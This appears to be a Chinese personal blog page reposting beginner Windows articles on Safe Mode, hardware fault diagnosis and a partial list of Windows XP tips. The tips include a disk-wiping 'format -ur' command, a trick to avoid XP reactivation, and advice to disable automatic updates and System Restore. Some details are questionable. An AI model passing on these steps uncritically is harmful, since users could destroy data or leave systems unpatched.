志刚 的个人资料曾经沧海难为水照片日志列表更多 工具 帮助

日志


7月29日

用好你的安全模式

不管你在电脑方面是新手还是老手,只要你用Windows,就肯定会经常听到一个词语:安全模式。初学者往往对这个概念往往理解含糊,什么是安全模式?难道平时系统都是“不安全模式”?安全模式能干什么?
什么是安全模式

 

我们都知道,对于现在的Windows 2000/XP/2003操作系统,系统本身的稳定性已经不是问题,而大量的驱动和应用程序才是危害系统稳定性和可靠性的罪魁祸首。可能系统本来工作非常正常,但是某天升级了一个有Bug的显卡驱动,或者安装了一个新版本的杀毒软件之后系统就无法正常启动了。为了解决这类会影响到Windows正常运行,但又并非Windows自身问题的故障,微软为我们准备了安全模式。

通过“安全模式”的方式登录到系统中,看到的桌面与通常看到的很不一样,就像在Windows 98系统中刚安装好系统而没有安装任何驱动程序时的模式,事实就是这样,当Windows在安全模式下运行的时候,系统将只载入能够启动系统的最基本的服务和驱动程序,这样操作系统将会使用最少的驱动和服务运行,并使用通用的显卡驱动程序,工作在640× 480的分辨率下,同时仅能支持键盘、鼠标、显示器、本地硬盘,并开启默认的系统服务。在安全模式下,Windows并不载入音频设备和其他非必要外设的驱动,而且Windows还会忽略所有随系统启动自动运行的程序。

提示: Windows XP/2003中的通用显卡驱动程序将可以在安全模式下显示24位色深和640 x 480的分辨率,然而这些设置是无法修改的。

怎样进入安全模式

启动过程中按下F8键是最传统也是最常用的方法:当我们打开电脑电源,硬件完成自检之后,立刻按下键盘上的F8键,你将看到如图1所示的界面。这里列出了很多高级启动选项。在此安全模式又分为几种,一般情况下我们选择进入普通的安全模式即可。除了这种最常用的方法外,在计算机启动时按住Ctrl键不放,也可以以“安全模式”启动系统。


Windows安全模式" style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid" alt="小菜必学 用好你的Windows安全模式" src="/Article/UploadPic/2006-6/200661341855872.jpg" align=no>

 

提示:至于其他几个高级启动选项的详细作用请参考微软知识库文章,KB 315222:http://support.microsoft.com/kb/315222/ZH-CN/ 。

另外,当你在Windows的正常模式下时,单击“开始/运行”,输入“msconfig”,然后在打开的窗口中选择“一般”选项卡,再勾选“论断启动-仅加载基本设备驱动程序和服务”项(如图2),最后单击“应用/确定”并重新启动,系统即会自动进入“安全模式”。

Windows安全模式" style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid" alt="小菜必学 用好你的Windows安全模式" src="/Article/UploadPic/2006-6/200661341857198.jpg" align=no>

 

利用安全模式解决实际问题

现在你也许大概知道了安全模式的意义,但究竟如何使用它呢?下面就让我们用实例来告诉你! 修复系统故障

有的时候,Windows运行起来不太稳定或者无法正常启动,这时就可以尝试使用“安全模式”来解决问题。试着重新启动计算机并切换到“安全模式”启动,成功以“安全模式”启动系统后,再重新按正常模式启动计算机,这样,系统会在“安全模式”下自动修复可能出错的注册表和某些系统文件,一些不太严重的系统错误就会被修复。

解决驱动或软件导致的崩溃

这个问题可能很多人都会遇到,这种情况下,唯一的解决办法就是卸载新驱动,恢复老版本的驱动,可问题是Windows都无法启动了,怎样卸载和恢复呢?如果你安装的驱动是用于一些非重要设备(例如网卡、显卡、声卡等)的,那么可以试试看进入安全模式进行恢复。

前面已经说过,在安全模式下,系统将只加载最基本的驱动程序,因此只要系统还能进入安全模式,我们就可以直接卸载驱动,或者Windows XP/2003用户可以利用“返回驱动程序”功能返回上一次的正确驱动(如图3)。


Windows安全模式" style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid" alt="小菜必学 用好你的Windows安全模式" src="/Article/UploadPic/2006-6/200661341857537.jpg" align=no>

 

纠正显示分辨率

如果我们在显示属性中设置了显示器无法接受的分辨率,例如给17寸的CRT显示器设置了1600×1200的分辨率,因为无法正查显示,我们也就无法将分辨率改为正常的设置。确实Windows有一种保护机制,当你设置了过高而显示器无法显示的分辨率的时候,只要等待30秒就会自动恢复到之前的分辨率,不过有时候因为各种原因,该功能可能会无法生效。

这时候就可以利用安全模式了,因为在安全模式下,系统都将显示640×480分辨率的桌面。因此我们大可以放心将系统启动到安全模式下,在显示属性中设置正确的分辨率,并重启动系统到正常模式下。

删除顽固软件或病毒木马

在常规模式下,有些病毒和木马(甚至正常软件)可能无法正确删除,因为他们可能和某些自动加载的软件有有联系。这时候你就可以试试安全模式。因为在安全模式下,大部分这类程序都不会被操作系统加载,因此我们可以放心用杀毒/木马软件删除病毒和木马,或者按照需要卸载一些正常模式下无法卸载的软件。

虽然现在的恶意软件和病毒越来越狡猾,有些可能在安全模式下也无法清除,不过在安全模式下删除软件软件或者病毒木马是初学者必须掌握的技巧。

磁盘碎片整理

系统用久了,在硬盘中便会出现很多碎片,碎片多了会影响系统的性能,也会浪费宝贵的硬盘资源。因此,建议大家定时给硬盘进行碎片整理,而在碎片整理的过程中,最好不要运行其它程序的,而一般在正常启动Windows时,系统会加载一些自动启动的程序,而这些程序又不易关闭,常常会对碎片整理程序造成干扰。这种情况下,我们就应该重新启动计算机,进入安全模式,安全模式是不会启动任何自动启动程序的,可以保证磁盘碎片整理的顺利进行。

想必通过这篇文章,大家对安全模式以及它的典型应用已经有基本的了解。不过安全模式的功用还有很多,希望初学者在碰到具体电脑问题的时候能够想到“安全模式”,说不定很多问题都会迎刃而解。  

学习判断电脑硬件故障

在电脑市场里最可怜的人要数那些将带有故障的电脑搬来搬去的人了。组装机与品牌机比起来虽然有她的长处,但没有良好的售后服务是她的致命短处。   
  大部分电脑故障是软件故障,因此在未确定是硬件故障前没必要将整台机器搬来搬去。即使是硬件故障,也没必要将整台机器搬去,只须将出故障的部件拿去即可。因此我们有必要了解硬件故障的诊断和测试方法,以后电脑出了故障不用将整台机器都搬去了(当然最好是不出故障!)。   
  故障及对策   
  如果想对电脑故障做全面的分析,那恐怕要写一本书,且那也并非易事。关于软件的故障在各类报刊上介绍过很多,因此这里只介绍硬件故障的症状,原因以及解决方法。   
  一、电脑启动过程   
  Ⅰ、首先来了解一下电脑的启动过程   
  1、贮存在ROM(只读存储器)中的Bootstrap Loader程序和自诊断程序移动到RAM(随机存储器)中。   
  2、随着Bootstrap Loader的运行,储存在辅助记忆装置中的操作系统将系统文件送到RAM中。   
  3、执行系统文件Io.sys和Msdos.sys。这时画面上出现“Starting Windowsn98……”的信息。   
  4、若有Config.sys则执行它。   
  5、执行系统文件的Command.com文件。   
  6、若有Autoexec.bat则执行它。   
  7、读取Windows的初始化文件“System.ini”和“Win.ini”,再读取注册表文件。   
  8、启动结束,出现初始画面,运行操作系统。   
  这个过程中,在主板的ROM BIOS中监测硬件是否异常,包括硬件故障,接线情况,各类卡的安装等。如果发生错误,画面上什么也不出现,启动停止。   
  这种情况下很可能是硬件故障。   
  Ⅱ、系统启动顺序   
  1、PC电源的ON——显示器,键盘,机箱上的灯闪烁。   
  2、检测显卡——画面上出现短暂的显卡信息。   
  3、检测内存——随着嘟嘟的声音画面上出现内存的容量信息。   
  4、执行BIOS——画面上出现简略的BIOS信息。   
  5、检测其他设备——出现其他设备的信息(CPU,HDD,MEM...)。   
  6、执行OS(操作系统)的初始化文件-Starting Windows 98等。   
  Ⅲ、在启动时主板中发出声音,通过这个声音可以判断是何种错误   
  根据主板形式的不同,声音的表示也有所不同.   
  AMI BIOS:   
  1短:内存刷新失败   
  2短:内存校验错误   
  3短:基本内存错误   
  4短:系统时钟错误   
  5短:CPU错误   
  6短:键盘错误   
  7短:实模式错误   
  8短:内存显示错误   
  9短:ROM BIOS校验错误   
  1长3短:内存错误   
  AWARD BIOS:   
  1短:启动正常   
  2短:非致命错误   
  1长1短:显示错误   
  1长2短:键盘错误   
  其他BIOS可查《BIOS错误提示音》,这里不再详细介绍。   
  二、易混淆的软件故障   
  必须明确地区分硬件故障和软件故障,否则费了很大的力气将电脑搬到电脑市场,店主告诉你是软件故障时你会是什么心情呢。特别是启动故障也有可能是软件故障造成的。下面我们就来看一看由软件故障造成的启动异常。   
  Ⅰ、CMOS Setup的错误   
  如果在CMOS Setup中的硬盘设置不正确的话,因为电脑无法识别硬盘,因此导致不能用硬盘中的操作系统(Windows)启动。出现画面但无法启动时应该检查CMOS Setup的内容。若要正确识别硬盘,可以使用CMOS Setup中的“IDE HDD Auto Detection”选项。   
  Ⅱ、系统文件的错误   
  Windows启动时需要Command.com, Io.sys, Msdos.sys, Drvspace.bin 四个文件。如果这些文件遭破坏,即使识别了硬盘也不能启动。这时可以使用“Sys.com”文件恢复这些文件。用启动盘启动后,键入“Sys c:”即可。   
  Ⅲ、初始化文件的错误   
  Windows在启动时要读取“Autoexec.bat”,“Config.sys”,“System.ini”,“Win.ini”,“User.dat”,“System.dat”六个文件。但在读取时若其中有错误的信息将发生启动失败。而这些文件是很难恢复的,因此要使用Windows重新设置等方法。但这不是硬件故障,用不着把电脑抱到电脑市场去。   
  Ⅳ、Windows的错误Windows初始画面出现后的故障大部分是软件的故障。程序间的冲突或驱动程序的问题等等。这样的问题可以用翻阅书籍等方法自行解决。   
 三、不是故障的硬件故障   
  虽然不是故障,但时常发生用户组装不正确或插口松等现象。这时可以自己打开电脑检查接线,插口等的错误。在新购硬盘,CD-ROM等EIDE设备时要注意将连接在中间的装置设置为“SlaveE”,将连接在边上的装置设置为“Master”,如果设置得不正确,有可能无法启动或使用相应装置时发生错误。   
四、硬件故障的检测方法   
  下面我们来看一看硬件故障的基本测试方法。显示器没有任何图像出现时可以使用下面的方法测试出故障的部件。   
  一、首先准备一个工作台。   
  二、将主板从机箱拔出,再把主板上的所有部件拔出,只留下CPU和RAM.然后把主板放到工作台上。   
  三、将稳压电源连接在主板上。   
  四、将显卡插入AGP插槽。当然如果是PCI显卡则插入PCI插槽中。插入时要注意将显卡镀金的部分完全地插入插槽中。   
  五、连接显示器电源插口后将显卡与显示器连接起来。   
  六、打开显示器电源,再接通机箱电源开关。然后用金属棒接触主板的电源开关。   
  主板的电源开关是与机箱电源开关连接的部分,一般标记为“PWR SW”或“POWER SE”。   
  七、如果画面上出现BIOS的版本信息,画面没有异常的话,说明CPU,主板,RAM,显卡,电源都正常.通常,经常易出现故障的部件是“显卡”,“主板”,“硬盘”这个顺序。   
  八、然后连接硬盘和软区进行检测。接着连接CD-ROM检测,然后是声卡。Modem等一个一个的连接进行检测。如果不出现画面就说明后连接的那个部件有故障或是有兼容性问题。只须处理那个出故障的部件即可。   
  九、机箱的问题   
  有时将主板安装到机箱时发生问题,导致启动失败。因此如果在上面的部件检查中没有任何问题的话,可以将主板安装到机箱上测试。如果在测试中没有任何的错误,则说明是CMOS Setup错误,驱动程序等的软件问题。   

检测电脑故障的简单方法   
  如果排除了“假故障”,那么就是真的有故障存在了!若再检测一下各配件的外观,包括打开机箱看到主机内部的各部件表面都没有被高电压击毁的迹象,或者明显的伤痕,若有的话,故障部件就清楚了。若都没有,可先试下面的处理方法。   
  1.清除尘埃   
  飘浮在空气中的尘埃是计算机一大杀手,使用一段后就可能因主板等关键部件积尘太多而出现故障,即便是在专用机房中也会如此。所以,对于使用了较长时间的计算机,应首先进行清洁,用毛刷轻轻刷去主板、外设上的灰尘。如果灰尘已清扫掉,或无灰尘,故障仍然存在,就表明硬件存在别的问题。   
  另外,由于板卡上一些插卡或芯片采用插脚形式,震动、灰尘等原因常会造成引脚氧化,接触不良。可用橡皮擦擦去表面氧化层,重新插接好后开机检查故障是否排除。   
  随便说一句,键盘使用日久往往会出现漏电、按键卡死等故障,此故障应及时处理,否则在输入文件时将会键入一些错误的字符。处理时应把键盘用一个托架托起来,按键向下,打开键盘的后盖,用酒精清洗线路板及按键的触点,并把卡死的按键下面的弹片适当撬起,使之恢复原有的弹性。   
  注意:软盘使用中,脏污或被划伤的软盘插入软驱时会划伤读写头,损坏软驱。清洗磁头时一定要十分谨慎,长时间不用的软驱,可能在磁头上会有锈蚀,此时不可使用清洗盘,具体做法是打开机箱将清洗剂滴在磁头上,浸泡半小时后,用脂棉小心地擦拭干净。如果盲目地使用清洗盘势必导致软驱读写头的损伤,使软驱报废。   

    2.看、听、闻、摸   
  “看”即观察系统板卡的插头、插座是否歪斜,电阻、电容引脚是否相碰,表面是否有烧焦痕迹,芯片表面是否开裂,主板上的铜箔是否烧断。当然了,不用说您也知道还要查看是否有异物掉进主板的元器件之间(这将造成短路),也可以看看板上是否有烧焦变色的地方,印刷电路板上的走线(铜箔)是否断裂等等。  

   “听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外,系统发生短路故障时常常伴随着异常声响,监听可以及时发现一些事故隐患和在事故发生前即时采取措施。   
  “闻”即辨闻主机、板卡中是否有烧焦的气味,便于发现故障和确定短路所在地。   
  “摸”即用手按压管座的活动芯片,看芯片是否松动或接触不良。另外,在系统运行时用手触摸或靠近CPU、显示器、硬盘等设备的外壳根据其温度可以判断设备运行是否正常;用手触摸一些芯片的表面,如果发烫,则为该芯片损坏。   
  3.拔插检测   
  前面说过,计算机产生故障的原因很多,主板自身故障、I/O总线故障、各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障发生在主板或I/O设备的简捷方法。该方法就是关机后,将插件板逐块拔出,每拔出一块板就开机观察机器运行状态,一旦拔出某块后主板运行正常,那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常,则故障很可能就在主板上。   
  拔插检测时,还能从另一个方面排除计算机故障:一些芯片、板卡与插槽接触不良,将这些芯片、板卡拔出后在重新正确插入可以解决因安装接触不当引起的微机部件故障。   
  4.交换检测   
  将同型号插件板,总线方式一致、功能相同的插件板或同型号芯片相互交换,根据故障现象的变化情况也可判断故障所在。此法多用于易拔插的维修环境,例如内存自检出错,可交换相同的内存芯片或内存条来判断故障部位,无故障芯片之间进行交换,故障现象依旧,若交换后故障现象变化,则说明交换的芯片中有一块是坏的,可进一步通过逐块交换而确定部位。如果能找到相同型号的微机部件或外设,使用交换法可以快速判定是否是元件本身的质量问题。   
  5.比较检测   
  运行两台或多台相同或类型相差不大的计算机,根据正常计算机与故障微机在执行相同操作时的不同表现可以初步判断故障产生的部位。   
  6.振动敲击检测   
  用手指轻轻敲击机箱外壳,若故障排除了,说明故障是由接触不良或虚焊造成的。然后,可进一步检查故障点的位置并排除之,只是此类故障难以检测到确切的部位。   
  7.升温降温检测   
  人为升高微机运行环境的温度,可以检验各部件,尤其是CPU的耐高温情况,因而及早发现事故隐患。降低运行环境的温度后,如果故障出现率大为减少,说明故障出在高温或不能耐高温的部件中,此举可以帮助缩小故障诊断范围。   
  事实上,升温降温法是采用的是故障促发原理,以制造故障出现的条件来促使故障频繁出现以观察和判断故障所在的位置,只是具体实施时要注意控制好加热方法,温度也不可超过摄氏40度。   
  8.运行检测程序   
  随着各种集成电路的广泛应用,焊接工艺越来越复杂,仅靠一般的维修手段往往很难找出故障所在,而通过随机诊断程序、专用维修诊断卡及根据各种技术参数(如接口地址),自编专用诊断程序来辅助检测,往往可以收到事半功倍的效果。程序测试的原理就是用软件发送数据、命令,通过读线路状态及某个芯片(如寄存器)状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路,但应用的前提是CPU及总线基本运行正常,能够运行有关诊断软件,能够运行安装于I/O总线插槽上的诊断卡等。   

  选择时诊断程序时要严格、全面、有针对性,能够让某些关键部位出现有规律的信号,能够对偶发故障进行反复测试,并能显示出错记录。   

如何诊断电脑故障   
  很多初学者刚接触电脑时都有一种恐惧感,认为电脑的故障一定是难以逾越的大问题。其实,多数电脑故障都有一定的规律可循,这方面的问题就好像是一层窗户纸,一捅就破,并不需要你具备太多电脑方面的知识。下面就让我们一起来学几招诊断电脑故障的快捷方法。 

   环境检查法   
  对于一些突如其来的硬件故障,如开机无显示等。我们先不要进行深入的考虑,因为往往我们会忽略一些细节问题。首先我们应该看看那些显而易见的东西:如有没有接通电源?开关是否已打开?电源插座有没有通电?是不是所有的接线都连接上了?或许问题的根源就在其中。   
  CMOS还原法   
  有些用户往往会因为好奇而改动主板CMOS里的一些设置,而这恰恰是导致故障发生的一个主要原因。如果电脑故障因此而起,那么我们可以通过还原CMOS的设置来解决问题。方法非常的简单,开机后按下键盘上的“Delete”键进入主板的CMOS,选择其中的“Load Optimized Defaults”(载入缺省设置),按“Y”键确认,保存退出CMOS即可。   
  注册表恢复法   
  有些用户喜欢通过修改注册表来达到对系统的优化设置或进行个性化设置,也有的用户在上网浏览时被恶意程序改动了注册表,一些故障就是因为对注册表不正常的更改而造成的。这时我们可以重新启动计算机,并切换到MS-DOS方式下,在C盘根目录下输入并执行“scanreg/restore”进入注册表恢复界面,然后选择一个电脑完好时的注册表文件,进行“Restore(还原)”,即可实现对注册表的恢复。   
  精简启动法   
  部分计算机故障是在我们安装一些软件后出现的,如果此时计算机还可以进入操作系统,那么我们可以在开始菜单中,运行“msconfig”程序,关闭启动菜单里除“internat.exe、Scanregistry、Systemtray”之外的所有程序。重新启动计算机后如果故障不再出现,那么问题多半是由某个自启动的软件造成的。   
  logged跟踪法   
  如果计算机已无法进入到Windows中或进入后不正常,那么我们可以采用Logged(\Bootlog.txt)的方式启动计算机,这样所生成的Bootlog.txt文件能够记录下故障出现的位置。使用Logged方式启动的方法是,在系统启动时按下键盘上的F8键,会出现启动菜单,选择以Logged方式启动,故障出现后,用Windows启动盘重新启动计算机,然后将C盘根目录下的Bootlog.txt文件复制到软盘上,在其他计算机上打开该文件,你会发现上面记录了Windows启动的整个过程,从中可以找到问题的根源。   
  设备替换法   
  所谓设备替换,就是当你怀疑哪个设备有问题时,用同样功能(最好是同一型号)的设备替换它,如果替换后问题消失了,那么多半就是这个设备出现了问题。   
  最小系统法   
  如果你不能确定是哪个硬件出现了问题,可以使用最小系统法来判断。最小系统法就是去掉系统中的其他硬件设备,只保留主板、内存、显卡三个最基本的部件,然后开机观察是否还有故障。如果有,则可排除其他硬件的问题,故障应来自于现有的三个硬件中。如果没有,则将其他硬件一一添加,查看在添加哪个硬件后出现故障,发现故障所在后,再针对这个硬件进行处理即可。   
  程序升级法   
  很多人对驱动程序重视不够,认为随便装一个就可以了。但是,我们在购买硬件时已经有了驱动程序,为什么硬件厂商还要不停地发布新版本的驱动程序呢?其实,这样做的目的就是为了让厂商自己的产品更加的完善。   
  由于现在的硬件更新速度很快,而且大多数硬件厂商的硬件研发先于软件研发,因此与硬件配套的驱动程序在刚发布时可能会存在一些小Bug,需要通过不断更新驱动程序来弥补这些缺陷。因此,升级驱动程序也是解决硬件故障的一项有效方法。   
  软件测试法   
  诊断硬件故障通常需要了解一些硬件方面的信息,但很多人没有记录硬件信息的习惯或不知该怎样记录。计算机出现故障后,可能会无法进入系统,这时候我们就需要一个在DOS下测试硬件的工具,如HwInfo for DOS,它的大小只有582KB,放在软盘里可以随身携带,借助于它就可以随时诊断硬件故障了。   
  更改资源法   
  很多计算机故障都是由硬件间的资源冲突引起的,对此我们可以采用更改资源的方法来解决。用鼠标右键点击“我的电脑”,在下拉菜单中选择“属性”一项,点击“设备管理器”,选择“按类型查看设备”,如果在列表中发现有设备被黄色的惊叹号标出,那么很可能是硬件间有了资源冲突。更改资源的方法是,用鼠标左键双击标有惊叹号的硬件,选择“资源”一项,去除“使用自动的设置”前的选勾,选择“更改设置”,将冲突的资源更改即可。 
 

电脑的140个技巧

1. 重装Windows XP不需再激活
  如果你需要重装Windows XP,通常必须重新激活。事实上只要在第一次激活时,备份好Windows\System32目录中的Wpa.dbl文件,就不用再进行激活的工作了。在重装Windows XP后,只需要复制该文件到上面的目录即可。

2. 如何知道自己的Windows XP是否已激活
  打开开始→运行,在弹出的对话框中输入:oobe/msoobe /a,回车后系统会弹出窗口告诉你系统是否已经激活。

3. 关闭zip文件夹功能

  你是不是觉得Windows XP中的zip文件夹功能太慢,功能也不吸引人?如果是这样,你可以打开开始→运行,在弹出的对话框中输入:regsvr32 /u zipfldr.dll,回车后即可关闭ZIP文件夹功能。

4.让Windows XP也能刻ISO文件

  Windows XP没有提供直接刻录ISO文件的功能,不过你可以下载一个第三方插件来为系统增加这个功能。

5. 登陆界面背景变变色

  打开注册表编辑器,找到[HKEY-USERS\.DEFAULT\Control Panel\Colors],将Background的值改为“0 0 0”(不带引号),这样登录背景就成了黑色。

6.完全卸载XP

  有些朋友在安装Windows XP后发现自己并不喜欢这个操作系统,这时你可以用Windows 98安装光盘启动到DOS状态,然后键入:
  format -ur

  这样可以删除所有XP的文件,并可重新安装Windows 98/Me。

7. 系统救命有稻草
  当怀疑系统重新启动之前针对计算机所进行的更改可能导致故障,可以在启动系统时按F8键,选择“最后一次正确的配置”来恢复对系统所做的更改。

8. 恢复硬件以前的驱动程序

  在安装了新的硬件驱动程序后发现系统不稳定或硬件无法工作时,只需在“设备管理器”中选择“驱动程序恢复”按钮,即可恢复到先前正常的系统状态。但不能恢复打印机的驱动程序。

9. 自动登陆

  单击开始→运行,输入“rundll32netplwiz.dll,UsersRunDll”(不带引号),然后在User Accounts中取消“Users must enter a user name and password to use this computer”,单击“OK”,接着在弹出的对话框中输入你想自己登陆的用户名和密码即可。

10.快速关机或重启的快捷键(可定时)

  在桌面点击鼠标右键,选择新建(快捷方式,在弹出的向导中输入位置为:C:\WINDOWS\system32\shutdown.exe -s -t 10(其中的-s可以改为-r,也就是重新启动,而-t 10表示延迟10秒,你可以根据自己的需要更改这个数字)。制作完这个快捷键后,按照上面的方法为它指定一个图标。这个快速关机或重启的技巧会显示一个比较漂亮的对话框提示关机(重启),而且你可以在后面加上“-c 我要关机啦!”,这样这句话会显示在对话框中,当然文字你可以随意写,但要注意不能超过127个字符。

11.关机、重启只要1秒钟

  如果你想让Windows XP瞬间关机,那么可以按下CTRL+ALT+DEL,接着在弹出的任务管理器中点击“关机”→“关机”,与此同时按住CTRL,不到1秒钟你会发现系统已经关闭啦,简直就在眨眼之间。同样道理,如果在“关机”菜单中选择“重启”,即可快速重启。


12. 寻找丢失的快速启动栏
  把鼠标移到任务栏的空白区域,单击右键从弹出的菜单中选择“属性”,在弹出的窗口中选择“任务栏”选项卡,再从“任务栏外观”框中把“显示快速启动”的复选框选中,“确定”就行了。

13. 批量文件重命名

  Windows XP提供了批量重命名文件的功能,在资源管理器中选择几个文件,接着按F2键,然后重命名这些文件中的一个,这样所有被选择的文件将会被重命名为新的文件名,在末尾处加上递增的数字)。

14. 快速锁定计算机

  在桌面上单击鼠标右键,在随后出现的快捷菜单上选择新建“快捷方式”,接着系统便会启动创建快捷方式向导,在文本框中输“rundll32.exe user32.dll,LockWorkStation”,点击“下一步”,在弹出的窗口中输入快捷方式的名称,点击“完成”即可。当然最简单的锁定计算机的方法是直接按WinKey + L。

15. 让双键鼠标具有滚页功能

  在控制面板中双击“鼠标”项,在弹出的“鼠标属性”对话框中选择“单击锁定” 栏中的“启动单击锁定”项。再点击“设置”按钮,在弹出的“单击锁定的设置”对话框中将鼠标设为最短,点击“确定”保存。打开一个网页,点击网页的卷轴,在离网页卷轴不远处上下移动鼠标,即可实现此功能。再次点击网页的卷轴即可关闭此功能。

16. 让Windows XP读英文字母

  找到“辅助工具”组里的“讲述人”程序,点击“声音”按钮,进入“声音设置”界面进行一番设置然后保存即可。当你把鼠标指向带有英文字母的对话框、菜单以及按钮时,会听见一个男声读着英文。


17.恢复Windows经典界面

        很多人安装了Windows XP后的第一感觉就是Windows变得漂亮极了。只是可惜美丽的代价要耗掉我们本就不富裕的内存和显存。要想恢复到和经典Windows类似的界面和使用习惯,请在桌面上单击鼠标右键,选择“属性”命令即可进入“显示属性”的设置窗口。这里共有“主题”、“桌面”、“屏幕保护程序”、“外观”和“设置”五个选项卡。在当前选项卡的标签上会有一条黄色的亮色突出显示,默认是“主题”选项卡,这里我们只要在“主题”的下拉选单里选择“Windows经典”,立即就可以在预览窗口看到显示效果,同时,外观选项卡的内容也会随之进行更改。
注意:Windows XP中“主题”和“外观”选项卡是息息相关的,只要更改其中的任何一个选项,在另一个选项卡中也会看到相应的改变。

18.恢复“开始”菜单

        Windows XP新的“开始”菜单还是挺方便的,对系统资源的影响也不大。如果你喜欢过去的经典菜单的话,用鼠标右键单击任务栏空白处,选择“属性”菜单,进入“任务栏和开始菜单属性”的设置窗口,选择“[开始]菜单”选项卡,选择“经典[开始]菜单”即可恢复到从前的模样了。

19.优化视觉效果

         Windows XP的操用界面的确是很好看,好看的背后是以消耗大量内存作为代价的,相对于速度和美观而言,我们还是宁愿选择前者,右键单击“我的电脑”,点击“属性/高级”,在“性能”一栏中,点击“设置/视觉效果”,在这里可以看到外观的所有设置,可以手工去掉一些不需要的功能。在这里把所有特殊的外观设置诸如淡入淡出、平滑滚动、滑动打开等所有视觉效果都关闭掉,我们就可以省下“一大笔”内存。

20.禁用多余的服务组件

        Windows XP和Windows 2000一样可以作为诸如Http服务器、邮件服务器、FTP服务器,所以每当Windows XP启动时,随之也启动了许多服务,有很多服务对于我们这些普通用户来说是完全没用的,所以关掉它们是一个很好的选择。操作的方法是:右键单击“我的电脑”,依次选择“管理/服务和应用程序/服务”,将不需要的服务组件禁用。
注意:有些服务是Windows XP必需的,关闭后会造系统崩溃。查看详细说明确认后再禁止对于Windows XP常见的90个服务,网上专门章节分析。

21.减少启动时加载项目

        许多应用程序在安装时都会自作主张添加至系统启动组,每次启动系统都会自动运行,这不仅延长了启动时间,而且启动完成后系统资源已经被吃掉不少!我们可以减少系统启动时加载的程序,方法是:选择“开始”菜单的“运行”,键入“msconfig”启动“系统配置实用程序”,进入“启动”标签,在此窗口列出了系统启动时加载的项目及来源,仔细查看你是否需要它自动加载,否则清除项目前的复选框,加载的项目愈少,启动的速度自然愈快。此项需要重新启动方能生效。

22.关闭系统还原功能

       “系统还原”功能是Windows系列操作系统的一个重要特色,当Windows运行出现问题后,还原操作系统。“系统还原”虽然对经常犯错误的人有用,但是它会让你的硬盘处于高度繁忙的状态,你会发现你的硬盘总是忙个不停,因为Windows XP要记录操作,以便曰后还原。如果你对自己有信心,那么就不要使用它,因为它可占不少内存。关闭系统还原功能方法是:单击“开始/所有程序/附件/系统工具/系统还原”,在系统还原界面,单击“系统还原设置”进入“系统还原设置”窗口,清空“在所有驱动器上关闭系统还原”复选框,这样Windows XP就会删除备份的系统还原点,从而释放它占用的磁盘空间。一般来说,为了兼顾系统性能和系统安全,笔者建议打开Windows XP所在盘符的系统还原功能。

23.关闭自动更新

      “自动更新”是Windows XP为了方便用户升级系统而推出的一种新功能,这种功能可以在微软推出系统升级补丁或系统安全补丁的时候,自动提醒用户升级自己的系统,不过这种功能有一个要求,就是用户必须时时在线,但是对于我们这些缺铁少银的“穷人”来说,这个要求未免苛刻,所以我们把“自动升级”功能关闭掉,改为“手动升级”。关闭自动更新具体操作为:右键单击“我的电脑/属性/自动更新”,在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。 

24.关闭远程桌面

       这个功能的一个特点就是可以让别人在另一台机器上访问你的桌面。在局域网中,这个功能很有用。比如你有问题了可以向同事求助,他可以不用到你的跟前,直接通过“远程桌面”来访问你的机器帮你解决问题。但是对于我们只有一台计算机的 普通用户来说这个功能就显得多余了,所以我们把它关掉,不让它在那儿白白浪费内存。具体操作为:右键单击“我的电脑”,选择“属性/远程”,把“远程桌面”里的“允许用户远程连接到这台计算机”勾去掉。

25.禁用消休眠功能

        Windows XP的休眠可以把内存中当前的系统状态完全保存到硬盘,当你下次开机的时候,系统就不需要经过加载、系统初始化等过程,而直接转到你上次休眠时的状态,因此启动非常快。但它会占用大量的硬盘空间(和你的内存大小一样),可以到“控制面板/电源选项/休眠”中将其关闭,以释放出硬盘空间,待到要需要使用时再打开即可。方法是:单击“开始/控制面板/电源管理/休眠”,将“启用休眠”前的勾去掉。

26.关闭“自动发送错误报告”功能

       大家在Window XP 中肯定有这样的经历,一旦一个程序异常终止,系统就会自动跳出一个对话框问你是否将错误发送给微软,这就是XP中的“自动发送错误”功能,它可以将错误信息发送到微软的网站。虽然微软一再信誓旦旦地表示,可以提供强大的安全保障,不会泄露个人隐私,但是发送给微软的信息中有可能包含你正在浏览或编辑的文档信息,也许这正包含了个人隐私或是公司机密,因此如果你想保障自己应有的权利,我们应该义无反顾的把这项功能关掉。方法是:单击“开始/控制面板/系统/高级”,单击“错误报告”按钮,然后选中“禁用错误报告”,下面的“但在发生严重错误时通知我”可以选中。

关闭“Internet时间同步”功能

         “Internet时间同步”就是使你的计算机时钟每周和Internet时间服务器进行一次同步,这样你的系统时间就会是精确的,不过这个功能对我们来说用处不大,而且还可能引起死机的问题。一般来说,只要在安装完Windows XP以后同步一次时间就可以了。所以我们要把它关掉。具体操作是:依次单击“开始/控制面板/曰期、时间、语言和区域选项”,然后单击“曰期和时间/Internet时间”。


27.合理设置虚拟内存

         对于虚拟内存文件,Windows XP为了安全默认值总是设的很大,浪费了不少的硬盘空间,其实我们完全可以将它的值设小一点。方法是:进入“控制面板/系统/高级/性能/设置/高级/虚拟内存/更改”,来到虚拟内存设置窗口,首先确定你的页面文件在哪个驱动器盘符,然后将别的盘符驱动器的页面文件全部禁用。建议你把它是设置到其他分区上,而不是默认的系统所在的分区,这样可以提高页面文件的读写速度,有利于系统的快速运行。根据微软的建议,页面文件应设为内存容量的1.5倍,但如果你的内存比较大,那它占用的空间也是很可观的,所以,建议如果内存容量在256MB以下,就设置为1.5倍,最大值和最小值一样,如果在512MB以上,设置为内存容量的一半完全可行。

28.删除多余文档

        Windows XP中有许多文件平时我们很少用到,放在硬盘中,白白浪费空间,降低系统性能。我们完全可以把这些用不到的文件删除,需要删除的文件有:
帮助文件:在C:\Windows\Help目录下。
驱动备份:C:\Windows\driver cache\i386目录下的Driver.cab文件。
